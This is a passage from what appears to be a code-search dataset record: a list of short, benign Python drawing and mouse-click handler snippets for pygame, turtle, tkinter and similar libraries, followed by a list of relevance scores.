event):\n # OPTIMIZE: create bar to offset and del this function\n if self.out_graph is False:\n\n if (event.button == 3 and event.xdata >= 0\n and event.xdata <= self.axe_X):\n self.offset_X += self.offset_X2\n self.offset_X2 = int(self.axe_X/2 - event.xdata - self.offset_X)\n self.img_debut = img_offset_X(self.img_debut, self.offset_X2)\n self.img2 = self.img_pixels(self.img_debut)\n self.ax.imshow(self.img2)\n self.fig.canvas.draw()", "def draw():", "def draw(self):", "def mousePressEvent(self, event):\n self.begin = event.pos()\n self.end = event.pos()\n self.update()", "def draw_walker(indx):\n chart_1.create_oval(hips[indx]-6, hips[indx+1]-6,hips[indx]+6, hips[indx+1]+6, fill= \"magenta\", width = 1, tag = 'line_1') \n chart_1.create_line(hips[indx], hips[indx+1], knee_a[indx], knee_a[indx+1], fill= \"blue\", width = 2, tag = 'line_1') \n chart_1.create_line(hips[indx], hips[indx+1], knee_b[indx], knee_b[indx+1], fill= \"green\", width = 2, tag = 'line_1') \n chart_1.create_line(knee_a[indx], knee_a[indx+1], heel_a[indx], heel_a[indx+1], fill= \"blue\", width = 2, tag = 'line_1') \n chart_1.create_line(knee_b[indx], knee_b[indx+1], heel_b[indx], heel_b[indx+1], fill= \"green\", width = 2, tag = 'line_1')", "def right_click_event(self, event):\n #print \"Clicked at %.1f %.1f\" %(event.x, event.y)\n #oval = self.canvas.create_oval(event.x-5, 10, event.x+5, 0, fill=\"red\", outline=\"blue\", width=1, tags=\"line tag\")\n #box = self.canvas.create_rectangle(event.x-5, -10, event.x+5, 10, fill=\"red\", outline=\"white\", width=1, tags=\"line tag\")\n \n #self.canvas.tag_raise(self.panel)\n for j in range(self.NREAD):\n if self.read_polygons[j].contains_point((event.x, event.y)):\n print('Read #%d!' 
%(j+1))\n \n self.marked_reads[self.i, j] = (not self.marked_reads[self.i, j])*1\n self.draw_lines()\n return None\n \n # if np.abs(self.marked_reads[self.i, j] - event.x) < 8:\n # self.marked_reads[self.i, j] = 0.\n # self.draw_lines()\n # return None\n \n # j = 0\n # while (self.marked_reads[self.i, j] > 0) & (j < 14):\n # j += 1\n # \n # self.marked_reads[self.i, j] = event.x*1.\n # \n # #print j, self.marked_reads[self.i,:]\n # self.draw_lines()\n return None", "def drawCells(self):\r\n self.drawing = not self.drawing\r\n if self.drawing:\r\n self.draw_button['text'] = \"No Draw\"\r\n else:\r\n self.draw_button['text'] = \"Draw\"", "def draw(self, win):\n img = self.tower_imgs\n win.blit(img, (self.x - img.get_width() // 2, self.y - img.get_height() // 2))\n\n if self.selected:\n self.menu.draw(win)", "def draw_t(self):\r\n pen.forward(20)\r\n pen.left(90)\r\n pen.down()\r\n pen.forward(40)\r\n pen.right(90)\r\n pen.up()\r\n pen.forward(20)\r\n pen.down()\r\n pen.back(40)\r\n pen.up()\r\n pen.right(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(50)", "def drawJumper(self):\n for x in self.jumper:\n print(x)", "def draw(self, screen):\r\n if self.selected:\r\n used_color = (255 - self.color[0], 255 - self.color[1], 255 - self.color[2])\r\n else:\r\n used_color = self.color\r\n pygame.draw.rect(screen, used_color,\r\n (self.location_top_left[0], self.location_top_left[1], self.size_x, self.size_y), 0)", "def draw(self, x, y):\r\n for w in self.widgets:\r\n if w.visible:\r\n w.draw()\r\n self.pointer.position(x + self.p_dx, y + self.p_dy, 0.5)\r\n self.pointer.draw()", "def up(self):\r\n self.brush_on = False", "def draw_target():\n\n t = turtle\n t.up()\n t.goto(-target[SIZE], -target[SIZE])\n t.setheading(0)\n t.pensize(2)\n t.down()\n for side in range(4):\n t.fd(target[SIZE] * 2)\n t.left(90)", "def draw(self,ctx):\n step = self.greatest / 5\n # Drawing the scale\n ctx.set_source_color(self.get_style().fg[gtk.STATE_NORMAL])\n for i in range(int(step), int(self.greatest),5):\n x_bearing, y_bearing, txt_width, txt_height = ctx.text_extents(str(i))[:4]\n ctx.move_to(-10.5 - txt_width / 2 - x_bearing, self.available_height - (self.available_height - 20) * i / self.greatest - txt_height / 2 - y_bearing )\n\n ctx.show_text(str(i))", "def draw_o(self):\r\n pen.down()\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.left(90)\r\n pen.up()\r\n pen.forward(50)", "def draw(self):\n if not self.pressed:\n #draw info prompt in room\n arcade.draw_rectangle_filled(self.center_x, self.center_y, 20, 20, arcade.color.ANTIQUE_BRASS)\n arcade.draw_text(\"?\", self.center_x, self.center_y, arcade.color.BLACK, anchor_x=\"center\", anchor_y=\"center\")\n else:\n #draw info to top of screen when clicked\n arcade.draw_text(self.text, 10, settings.HEIGHT - 10, arcade.color.BLACK, anchor_x=\"left\", anchor_y=\"top\")", "def down(self):\r\n self.brush_on = True", "def ToggleDrawingTools(self, event):\n pass", "def on_click(self, e: ti.template()):\n for i, j in ti.ndrange(self.nx, self.ny):\n if self.inside(self.Vector2(i / self.nx, j / self.ny),\n self.Vector2(e.pos[0], e.pos[1]), 0.03):\n self.T[i, j] = 1", "def interaction_door(self) -> None:\n self.grid.win = True", "def _right_click(self, event):\n\n position = event.x, event.y\n cell_position = self._game.grid.pixel_to_cell(position)\n\n removed_tower = self._game.remove(cell_position)\n self._coins += removed_tower.get_value() * 0.8\n\n #updates coins string 
var to display coins\n self._status_bar.set_coins(self._coins)\n\n #update availability for tower views\n for tower, view in self._tower_views:\n if self._coins < tower.get_value():\n view.set_available(False)\n else: \n view.set_available(True)", "def grab(self, event):\n self.ypos = event.y\n self.xpos = event.x\n self.config(cursor='fleur')", "def Point_Pick(self):\n self.vtkWidget.iren.AddObserver('RightButtonPressEvent', self.pick_loc)\n self.renWin.Render()", "def draw(self, screen):" ]
[ "0.6205973", "0.61523294", "0.6008315", "0.5989245", "0.5944279", "0.5893319", "0.5844363", "0.5831077", "0.5826656", "0.58184046", "0.58160055", "0.5798459", "0.5755259", "0.57308894", "0.5701369", "0.5675944", "0.5657623", "0.56501853", "0.56467706", "0.5638101", "0.56190854", "0.56162554", "0.56036353", "0.56012714", "0.55674446", "0.555112", "0.5537631", "0.5533743", "0.5526541", "0.55262685" ]
0.7217638
0
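The draw_range document above leans on pygame's per-pixel alpha: only a surface created with SRCALPHA can hold the translucent grey fill (alpha 100 of 255) that lets the map show through the range circle. A self-contained sketch of the same technique; the window size, radius, and colours are arbitrary values chosen for illustration:

import pygame

pygame.init()
win = pygame.display.set_mode((400, 400))
win.fill((0, 0, 0))

radius = 100
# The SRCALPHA flag gives the overlay surface an alpha channel of its own.
overlay = pygame.Surface((radius * 2, radius * 2), pygame.SRCALPHA, 32)
pygame.draw.circle(overlay, (128, 128, 128, 100), (radius, radius), radius, 0)
win.blit(overlay, (200 - radius, 200 - radius))
pygame.display.flip()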
Returns the scan resolution of the ship, in mm.
def scanResolution(self): return self._getAttribute(Attribute.scanResolution)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getResolution(self):\n return self.resolution", "def getResolution(self):\n return self._lowLevelGetDeviceResolution()", "def get_current_resolution(self):\n return self.display_info[\"width\"], self.display_info[\"height\"]", "def resolution(self) -> int:\n return self._resolution", "def Resolution(self):\n\t\treturn self._get_attribute('resolution')", "def get_resolution(self):\n return self.__resolution", "def resolution(self) -> int:\n return self.options.resolution", "def resolution(self):\n return self._resolution", "def resolution(self):\n return Prism.resolution(self,self.beam,self.wavelength)", "def resolution_mm_xy(self):\n return self.resolution_pixels_xy * self.pixels_to_mm_scale_factors_xy", "def resolution(self):\n assert self.has_video\n\n return self.__resolution", "def _resolution(self):\n _, xres, _, _, _, yres = self.geotransform\n return xres, yres", "def resolution(self):\n return {'x': self.width, 'y': self.height}", "def get_device_resolution(self):\n\t\tinstance = Device()\n\t\twidth, height = instance.get_screen_resolution() \n\t\treturn list((width, height))", "def effective_resolution(self) -> Tuple[int, int]:\n import numpy as np\n\n assert self.info.resolution, 'No base resolution specified'\n rot = (self.info.rotate or 0) * math.pi / 180\n sin = math.sin(rot)\n cos = math.cos(rot)\n scale = np.array([[self.info.scale_x or 1.0, self.info.scale_y or 1.0]])\n resolution = np.array([[self.info.resolution[0], self.info.resolution[1]]])\n rot_matrix = np.array([[sin, cos], [cos, sin]])\n resolution = (scale * abs(np.cross(rot_matrix, resolution)))[0]\n return int(round(resolution[0])), int(round(resolution[1]))", "def width(self):\n return self.config.get('resolution', {}).get('x',1920) #1280", "def size(self) -> (float, float):\n\n return self.screen.get_surface().get_size()", "def pixelsize(self):\n if hasattr(self, \"_pixelsize\"):\n return self._pixelsize\n\n try:\n return self.header[\"PixSize\"] # [arcsec]\n except KeyError:\n try:\n return abs(self.header[\"CDELT1\"]) * 3600 # [deg] -> [arcsec]\n except KeyError:\n return None", "def getSweepResolution(self) -> int:\n\n if not self.debug:\n self.myFieldFox.write(\"SWE:POIN?\")\n ret = int(self.myFieldFox.read())\n else:\n ret = 401\n return ret", "def get_pixel_size(self):\n p0 = core.PointF(0, 0)\n p1 = core.PointF(1, 1)\n tr = self.transform().inverted()[0]\n p01 = tr.map(p0)\n p11 = tr.map(p1)\n return core.PointF(p11 - p01)", "def get_screen_resolution() -> (int, int):\n h_desktop = user32.GetDesktopWindow()\n\n # Get screen resoltion virtualized for DPI\n rect = RECT()\n success = user32.GetWindowRect(h_desktop, pointer(rect))\n if not success:\n raise OSError(GetLastError())\n\n # Get rescale factor for primary monitor\n hmonitor = user32.MonitorFromWindow(\n h_desktop, MONITOR_DEFAULTTOPRIMARY)\n rescale_factor = c_long(0)\n result = shcore.GetScaleFactorForMonitor(\n hmonitor, pointer(rescale_factor))\n if result != S_OK:\n logging.error(\"GetScaleFactorForMonitor failed.\")\n raise OSError(GetLastError())\n\n # Calcuate the resolution before scaling.\n rescale_factor = rescale_factor.value\n res_x = int((rect.right - rect.left) * rescale_factor / 100)\n res_y = int((rect.bottom - rect.top) * rescale_factor / 100)\n return res_x, res_y", "def resolution_range(self) -> Optional[float]:\n return self._get_property(RESOLUTION_RANGE_PROP, float)", "def get_precision(self):\n config_str = self.raw_sensor_strings[1].split()[4] # Byte 5 is the config register\n bit_base = int(config_str, 16) >> 5 # 
Bit 5-6 contains the resolution, cut off the rest\n return bit_base + 9 # min. is 9 bits", "def getSize(self):\n return self.screen.get_size()", "def get_resolution(self):\n ret_val = False\n width = 0\n height = 0\n try:\n sink = self.player.get_by_name('sink')\n sample = GstBase.BaseSink.get_last_sample(sink)\n caps = Gst.Sample.get_caps(sample)\n struct = Gst.Caps.get_structure(caps, 0)\n h_result, height = Gst.Structure.get_int(struct, \"height\")\n w_result, width = Gst.Structure.get_int(struct, \"width\")\n if h_result and w_result:\n ret_val = True\n except:\n ret_val = False\n\n return ret_val, width, height", "def pix_size(self):\n return self._pix_size", "def _get_scaling(root):\n dpi = root.winfo_fpixels(\"1i\")\n scaling = dpi / 72.0\n logger.debug(\"dpi: %s, scaling: %s'\", dpi, scaling)\n return scaling", "def getResolution(s) -> int:\n unit = getDurationUnit(s)\n #number of ticks is 1 / unit (if that is an integer)\n ticksPerQuarter = unit.denominator / unit.numerator\n if ticksPerQuarter.is_integer():\n return int(unit.denominator / unit.numerator)\n else:\n print(s.filePath, ' non integer number of ticks per Quarter')\n return 0", "def get_screen_size(self):\n return self.__screen_size", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz" ]
[ "0.7246049", "0.69126594", "0.685117", "0.6794998", "0.67246604", "0.6541934", "0.6535295", "0.6369", "0.6277552", "0.6272509", "0.6237596", "0.62197703", "0.61901945", "0.6151652", "0.61414826", "0.61146194", "0.6110332", "0.6093271", "0.6090543", "0.6054958", "0.60548455", "0.6043546", "0.601135", "0.6004819", "0.6001022", "0.59914637", "0.5979775", "0.5977079", "0.59722686", "0.5932197" ]
0.73278564
0
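The `_getAttribute` helper that this property (and the ship properties in the rows below) delegates to is never shown in the dataset. A plausible minimal backing for it is a dict of dogma attributes keyed by an Attribute enum member; the storage layout here is an assumption for illustration only:

class Ship:
    def __init__(self, attributes):
        # attributes: mapping of Attribute enum member -> numeric value
        self._attributes = attributes

    def _getAttribute(self, attribute, default=None):
        # Missing attributes fall back to `default` instead of raising,
        # which lets callers probe several candidate attributes cheaply.
        return self._attributes.get(attribute, default)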
Returns the max number of locked targets.
def maxTargets(self): return self._getAttribute(Attribute.maxTargets)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def maxTasksAchievable(self):\n maxTasks = 0\n for w in self._workers:\n maxTasks = maxTasks + w.multitask\n return maxTasks", "def max_node_count(self) -> int:\n return pulumi.get(self, \"max_node_count\")", "def node_count_max(self) -> int:\n return int(self.graph_tuple_stats.node_count_max or 0)", "def getMaxNumPins(self):\n return max(b.getNumPins() for b in self.getBlocks())", "def max_num_links(self):\n return self._max_num_links", "def maximum_number_of_workers(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"maximum_number_of_workers\")", "def numprocesses(self):\n info = self.info()\n return info['max_processes']", "def max_creds(self) -> int:\n return self._max_creds", "def max_node_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_node_count\")", "def max_count(self):\n return self.config.get('max_count', 500)", "def testMaxTargets(self):\n\n self.assertEqual('Maxtargets: %s' % inventory_base.DEFAULT_MAXTARGETS,\n self.inv._CmdMaxTargets('maxtargets', []))\n self.inv._CmdMaxTargets('maxtargets', ['10'])\n self.assertEqual(10, self.inv._maxtargets)", "def max_waiting(self):\n return self._max_waiting", "def control_edge_count_max(self) -> int:\n return int(self.graph_tuple_stats.control_edge_count_max or 0)", "def get_max_cleverbot_requests(self):\n return int(self.bot_data_file[\"maxCleverbotRequests\"])", "def max_nodes(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"max_nodes\")", "def get_number_executors(self):\n with self.__threads_lock:\n return self.__number_executors", "def maximum_number_of_workers(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"maximum_number_of_workers\")", "def jobserver_max_jobs():\n\n if _MakeJobServer._singleton is not None:\n return _MakeJobServer._singleton.num_jobs\n else:\n return 0", "def num_tasks(self) -> int:\n return len(self.targets)", "def concurrent_tasks_limit(self):\n return self._concurrent_tasks_limit", "def max_pending(self):\n return self._max_pending", "def max_num_neighbors(self):\n return self._max_num_neighbors", "def total_max_node_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"total_max_node_count\")", "def max_individuals(self) -> int:\n return self.group_size.upper * self.groups_allowed", "def max_trials(self) -> int:\n return self._max_trials", "def max_known_number(self):\n return len(self.number_list)-1", "def getMaxMancount(self):\n return self.__size * 20", "def getNrTargets(self):\n return self.targetNames.size", "def maxTimes(self)->int:\n return self._lic.params['maxAccessTimes'].value", "def max_parallel_launches(self) -> Optional[int]:\n return pulumi.get(self, \"max_parallel_launches\")" ]
[ "0.7053719", "0.6945075", "0.67787427", "0.6716458", "0.66914487", "0.65706974", "0.6546918", "0.6542584", "0.65309083", "0.65046275", "0.6473251", "0.6438238", "0.6386052", "0.6385337", "0.6385203", "0.63613576", "0.6358105", "0.63530767", "0.63487595", "0.6279512", "0.6271077", "0.62642294", "0.6264195", "0.62610316", "0.6255949", "0.62487525", "0.6232971", "0.6205189", "0.6177911", "0.61687356" ]
0.6987084
1
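A usage sketch for maxTargets: in EVE-style targeting the effective lock count is the smaller of the hull's cap and a pilot-skill cap. The skill cap of 7 below is an invented example value, not data from the row:

def effective_locked_targets(ship, pilot_skill_cap=7):
    # The hull attribute is only an upper bound; skills impose their own.
    return min(ship.maxTargets, pilot_skill_cap)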
Returns the sensor strength of the ship.
def sensorStrength(self): # TODO: also return type of sensor radar = self._getAttribute(Attribute.scanRadarStrength) ladar = self._getAttribute(Attribute.scanLadarStrength) magnetometric = self._getAttribute(Attribute.scanMagnetometricStrength) gravimetric = self._getAttribute(Attribute.scanGravimetricStrength) return radar or ladar or magnetometric or gravimetric
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getStrength(self):\n return self.st", "def strength(self) -> int:\n return self._strength", "def wireless_signal_strength(self) -> int:\n return self.data[Attribute.WIRELESS_SIGNAL_STRENGTH]", "def getPersonStrength(self):\n strength = self.myDesign.myShipHull.mass/200\n return strength", "def get_strength(self):\n return 10 - self.get_agility()", "def strength(self) -> float:\n ...", "def get_wind_sensor(self) -> int:\n self.serial.write(b\"V!\")\n wind_sensor = self.__extract_int(self.__read_response(1)[0], b\"!w\")\n\n return wind_sensor", "def get_winStrength(self):\n if self.winStrength is None:\n self.calculate_my_win_strength()\n return self.winStrength", "def strength(self):\n return self._characterStrength", "def weapon_strength(weapon):\n weapon_strength_int = WEAPON_STRENGTHS[weapon]\n #print weapon_strength_int\n return weapon_strength_int", "def wind_speed(self):\r\n return self._yesterdays_weather.get_average_wind_speed()", "def get_water_level(self):\n return self.water_level", "def getOutputStrength(self):\n return DPxGetDinDataOutStrength()", "def ship_rate(self):\n\t\treturn self.industry * (self.manufacturing.level + 5) / 24.0", "def GetCurrentSignalStrength(self, iwconfig=None):\n try:\n strength = int(self.wifi.GetSignalStrength(iwconfig))\n except:\n strength = 0\n return strength", "def getLightSensor() -> int:\n pass", "def get_windtspeed(self):\n return self.read_register(4111, 0, 3)", "def windspeed(self):\r\n try:\r\n return str(self.connect()['wind']['speed'])\r\n except:\r\n return '@weather_windspeed'", "def native_wind_speed(self) -> float:\r\n return self._first_timeserie[\"data\"][\"instant\"][\"details\"][\"wind_speed\"]", "def tower_damage(self):\n return self._tower_damage", "def get_distance(self, sensor):\n if sensor not in self.distance_sensors:\n raise ValueError('sensor should be one of {}!'.format(self.distance_sensors))\n\n return 255 - self._io.last_state['distance'][sensor]", "def get_resistance(self):\n adc = ADC(self.pin)\n value = adc.read()\n if value == 0:\n return -1\n\n return (4095./value - 1.) * self.RLOAD # ESP32 maksimi, ESP8266:lle arvo on 1023", "def getWatts(self):\n return self.json_state.get(\"charging\").get(\"watt_power\")", "def wind_speed(self):\n return self.flow_field.wind_speed", "def get_speed(self):\n return self.get_par(\"slew_speed\")", "def get_health(self):\n return round(self.health)", "def get_total_energy_produced (self):\n return self.net_generation_wind", "def state(self):\n value = getattr(self.coordinator.senec, self._sensor)\n try:\n rounded_value = round(float(value), 2)\n return rounded_value\n except ValueError:\n return value", "def wind_speed(self):\n names = ['anc_mean_wind_speed']\n return self.sensor.get_with_fallback('wind_speed', names)", "def native_wind_gust_speed(self) -> float | None:\n return self._wind_gust_speed" ]
[ "0.72526914", "0.67626673", "0.6689082", "0.6676303", "0.6576709", "0.6460022", "0.6326511", "0.6292669", "0.62278104", "0.6079792", "0.60773563", "0.602665", "0.6026219", "0.5985158", "0.5903484", "0.5875291", "0.58557934", "0.582385", "0.5819542", "0.58171266", "0.58148235", "0.5793279", "0.57787484", "0.57715786", "0.57208943", "0.57092875", "0.5704306", "0.569264", "0.5689249", "0.5662216" ]
0.79078126
0
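The TODO in the sensorStrength document asks for the sensor type as well. Below is one way to extend the same first-truthy-value pattern that the `or` chain implements; the attribute names follow the row, while the (type, strength) return shape is an assumption:

def sensorStrengthWithType(self):
    candidates = [
        ("radar", Attribute.scanRadarStrength),
        ("ladar", Attribute.scanLadarStrength),
        ("magnetometric", Attribute.scanMagnetometricStrength),
        ("gravimetric", Attribute.scanGravimetricStrength),
    ]
    for sensor_type, attribute in candidates:
        strength = self._getAttribute(attribute)
        if strength:  # a hull has exactly one non-zero sensor strength
            return sensor_type, strength
    return None, 0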
Returns details about the ship's capacitor.
def capacitor(self): capacity = self._getAttribute(Attribute.capacitorCapacity) recharge = self._getAttribute(Attribute.capacitorRecharge) recharge /= 1000 # milliseconds return { "capacity": capacity, "recharge": recharge, }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getShip(self):\r\n return self._ship", "def my_ship_info(self, ship_id):\n r = requests.get(self.base_url + f'/users/{self.username}/ships/{ship_id}', headers=self.auth_header)\n return r.text", "def get_card(self):\n return self.card", "def card(self):\n return self.cdb.name_to_card[self.card_name]", "def capacidad(self) -> int:\n return self._capacidad", "def show_board(self):\n print(self.capacity_list)", "def _player_info(self):\n return \"%r %s seat:%s m:%r c:%s b:%s \" % (self.name, self.serial, self.seat, self.money, self._chips, self._bet)", "def info(self, req):\n items = api.get_zone_capabilities(req.environ['nova.context'])\n\n zone = dict(name=FLAGS.zone_name)\n caps = FLAGS.zone_capabilities\n for cap in caps:\n key, value = cap.split('=')\n zone[key] = value\n for item, (min_value, max_value) in items.iteritems():\n zone[item] = \"%s,%s\" % (min_value, max_value)\n return dict(zone=zone)", "def get_coulomb_info(self):\n return", "def get_pbc_info(self):\n return", "def __repr__(self):\n return f\"Card({self.face}, {self.value}, {self.suit})\"", "def meta(self) -> CardMeta:\n return self._stat", "def billing_info(self):\n return self._billing_info", "def capacitance(self):\n return None", "def cap(self):\n return self._cap", "def get_display_info(self):\n return self.display_info", "def getMyShipInfo(self):\n d = self.getMyInfoAsDict()\n d['quads'] = self.getMyDictInfo('quads', 'getMyQuadInfo')\n d['targets'] = self.targets\n d['availSystems'] = self.availSystems\n d['oldAvailSystems'] = self.oldAvailSystems\n return d", "def get(self):\n user = get_authenticated_user()\n return get_card(user)", "def get_card (self, card):\n\t\treturn self._card", "def __repr__(self):\n name = \"Investor: %s\" % self.name\n cash = \"Cash: %s\" % self.cash\n risk_money = \"Risk Money: %s\" % self.risk_money\n portfolio = \"Portfolio: %s\" % self.portfolio\n info = name + cash + risk_money + portfolio\n return info", "def get_capacitor(self):\n cap = 0.5 * self.metric_.logdet()\n return cap", "def get_cp_info(self):\n return self.get(COMMAND_CPM, 'GetCpInfo')", "def get_info(self, charger):\n data = {\n \"device_id\": self.uuid,\n \"cmd\": \"get_info\",\n \"token\": charger.token(),\n \"account_token\": self.api_token\n }\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n response = requests.post(\"{}/box_api_secure\".format(self.BASE_URL),\n data=json.dumps(data),\n headers=headers)\n response_json = response.json()\n return response_json", "def get_info(self):\n self.exists = self.check_subscr()\n return self.attrs", "def draw_active_player_stats(self, screen):\n p = self.game.turn_manager.get_vision_character()\n\n for index, (k, v) in enumerate(p.characteristics.items()):\n self.game.draw_text(k + \": \" + str(v),\n self.game.title_font, 40, YELLOW_LIGHT, 7*WIDTH // 12, (6 + index)*HEIGHT // 20,\n screen=screen)\n\n self.game.draw_text(\"HP : \" + str(p.health) + \"/\" + str(p.max_HP),\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 8*HEIGHT // 20,\n screen=screen)\n self.game.draw_text(\"Mana : \" + str(p.MP) + \"/\" + str(p.max_MP),\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 9*HEIGHT // 20,\n screen=screen)\n self.game.draw_text(\"Xp : \" + str(p.xp) + \"/ 100\",\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 10*HEIGHT // 20,\n screen=screen)\n self.game.draw_text(\"Gold : \" + str(p.gold),\n self.game.title_font, 40, YELLOW_LIGHT, WIDTH // 3, 11*HEIGHT // 20,\n screen=screen)\n screen.blit(p.image, (WIDTH // 3, 5*HEIGHT // 20))", "def 
get_vacuum_gripper(self):\r\n return self._arm.get_suction_cup()", "def billing_info(self):\r\n return BillingInfo(self)", "def obter_caminho(self):\n return self.caminho", "def __str__(self):\n if self.rank == 1 and self.suit == 0:\n return \"Back of card\"\n else:\n return ((Card.ranks[self.rank]) + ' of ' + (Card.suits[self.suit]))", "def __repr__(self):\n return str.format(\"Cards: {0} Rank: '{1}' Values: {2}\",\n self.__cards,\n Hand.RANKS[self.rank()],\n self.values())" ]
[ "0.6025865", "0.5962599", "0.5775231", "0.5688934", "0.5532411", "0.53715676", "0.53670514", "0.5319011", "0.52973115", "0.52933747", "0.5288867", "0.5282726", "0.5235691", "0.5224877", "0.52141637", "0.52120286", "0.5172074", "0.5133092", "0.51199114", "0.50787777", "0.5068533", "0.5023075", "0.50141275", "0.5001285", "0.499059", "0.4978675", "0.49731326", "0.49597275", "0.4959289", "0.49534786" ]
0.63753223
0
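A worked example on top of the dict the capacitor property returns: capacitor regeneration is non-linear, and the widely cited peak recharge rate works out to 2.5 * capacity / recharge_time (community-documented game mechanics, not a formula stated in the row):

def peak_recharge_rate(cap):
    # cap: the dict returned by the capacitor property above,
    # {"capacity": <GJ>, "recharge": <seconds>}
    return 2.5 * cap["capacity"] / cap["recharge"]  # GJ per second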
Returns details about the ship's armor. Resists are returned as fractions from 0.0 to 1.0.
def armor(self): capacity = self._getAttribute(Attribute.armorCapacity) em = self._getAttribute(Attribute.armorEM) explosive = self._getAttribute(Attribute.armorExplosive) kinetic = self._getAttribute(Attribute.armorKinetic) thermal = self._getAttribute(Attribute.armorThermal) em = 1.0 - em explosive = 1.0 - explosive kinetic = 1.0 - kinetic thermal = 1.0 - thermal return { "capacity": capacity, "resists": { "em": em, "explosive": explosive, "kinetic": kinetic, "thermal": thermal } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getArmor(self):\n return self.av", "def armor(self) -> Union[int, float]:\n return self.type_data.proto.armor", "def armor(self) -> Union[int, float]:\n return self.type_data.proto.armor", "def get_armor_equipped(self):\n\t\treturn self.equippedArmor", "def armor_mapping(self, armor: int) -> str:\n if armor == 0:\n return 'leather'\n elif armor == 1:\n return 'chain-shirt'\n elif armor == 2:\n return 'ring-mail'\n elif armor == 3:\n return 'chain-mail'\n elif armor == 4:\n return 'scale-mail'\n elif armor == 5:\n return 'studded-leather'", "def info_equipment_get():\n equipment = _equipment_by_group()\n return equipment, 200", "def calculate_hit(self, armor_list, inventory):\n armor_power = 0\n for armor in armor_list:\n armor_power += inventory[armor]['power']\n max_strength = max(1, (self.level * 5) - armor_power)\n min_strength = 0\n return random.randint(min_strength, max_strength)", "def info_equipment_reactors_get():\n equipment = _equipment_by_group(438) # 438 == Mobile Reactor\n return equipment, 200", "def hk_armor(self):\n self.name = \"Holy Knight's Armor\"\n self.rarity = \"Common\"\n self.pdef_value = 40\n self.mdef_value = 10\n self.increase_crit = 0\n self.desc = \"Armor of the Holy Guard, you feel the light flowing.\"", "def get(self, item_type):\n armor_type_id = 0 if item_type == \"light\" else 1\n where = f\"type={armor_type_id}\"\n return get_as_object(\"armor\", ArmorData, where=where)", "def choose_armor():\n a = input(\"\"\"\n Choose your armor:\n (1) Heavy\n (2) Medium\n (3) Light\n \"\"\")\n\n saving_throws = ['Evasion', 'Hardiness', 'Spirit']\n if int(a) == 1:\n print(\"You chose Heavy!\")\n x = choose_armor_throw(saving_throws)\n # Remove the chosen saving throw from the list\n del saving_throws[saving_throws.index(x)]\n y = choose_armor_throw(saving_throws)\n return {\n 'type': 'heavy',\n 'ac_mod': -6,\n 'sv_throws': [x, y]\n }\n\n if int(a) == 2:\n print(\"You chose Medium!\")\n x = choose_armor_throw(saving_throws)\n return {\n 'type': 'medium',\n 'ac_mod': -4,\n 'sv_throws': [x]\n }\n if int(a) == 3:\n print(\"You chose Light!\")\n return {\n 'type': 'light',\n 'ac_mod': -2,\n 'sv_throws': []\n }", "def get_armor_options(self):\n\t\toptions = []\n\t\tfor arm in self.inventoryDictionary:\n\t\t\tif isinstance(arm, Items.Armor):\n\t\t\t\toptions.append(arm.name)\n\n\t\treturn options", "def equip_armor(self, armor):\n\t\tfor key in self.inventoryDictionary:\n\t\t\tif key.name == armor:\n\t\t\t\tself.equippedArmor = key\n\t\t\t\treturn True\n\t\treturn False", "def get_damage():\n\n return character['Damage']", "def ac(self):\n if self.armor:\n return self.armor.ac\n return 10 + self.dexterity", "def shield(self):\n capacity = self._getAttribute(Attribute.shieldCapacity)\n recharge = self._getAttribute(Attribute.shieldRecharge)\n em = self._getAttribute(Attribute.shieldEM)\n explosive = self._getAttribute(Attribute.shieldExplosive)\n kinetic = self._getAttribute(Attribute.shieldKinetic)\n thermal = self._getAttribute(Attribute.shieldThermal)\n\n recharge /= 1000 # milliseconds\n em = 1.0 - em\n explosive = 1.0 - explosive\n kinetic = 1.0 - kinetic\n thermal = 1.0 - thermal\n\n return {\n \"capacity\": capacity,\n \"recharge\": recharge,\n \"resists\": {\n \"em\": em,\n \"explosive\": explosive,\n \"kinetic\": kinetic,\n \"thermal\": thermal\n }\n }", "def getResistance(state, resType) :\n debufF = reduce(lambda x, y: x + y, getDebuff(state, resType), 0)\n return state['enemy']['resistance'][resType] + debufF", "def get(self, item_type, entry_name):\n armor 
= ArmorData(name=entry_name)\n if not hasattr(armor, 'level'):\n return {\"Error\": f\"'{entry_name}' not found in {item_type} armor. \"\n f\"Try this: '{NS.armor._path}/{item_type}/search/\"\n f\"{entry_name.replace(' ', '%20')}'\"\n }, 404\n return armor.associative_data()", "def calculate_damage(\n self, amount:int, *, \n scan_dict:Optional[Dict]=None, \n precision:int=1, \n calculate_crew:bool=True, \n calculate_systems:bool=True, \n damage_type:DamageType,\n use_effective_values:bool=True\n ):\n #assume damage is 64, current shields are 80, max shields are 200\n #armor is 75, max armor is 100\n #80 * 2 / 200 = 160 / 200 = 0.8\n #0.8 * 64 = 51.2 = the amount of damage that hits the shields\n #64 - 51.2 = 12.8 = the amount of damage that hits the armor and hull\n #1 - (75 / 100) = 1 - 0.25 = 0.75\n #12.8 * 0.75 = 9.6 = the amount of damage that hits the armor\n #12.8 - 9.6 = 3.2 = the amount of damage that hits the hull\n \n random_varation = damage_type.damage_variation\n \n if random_varation > 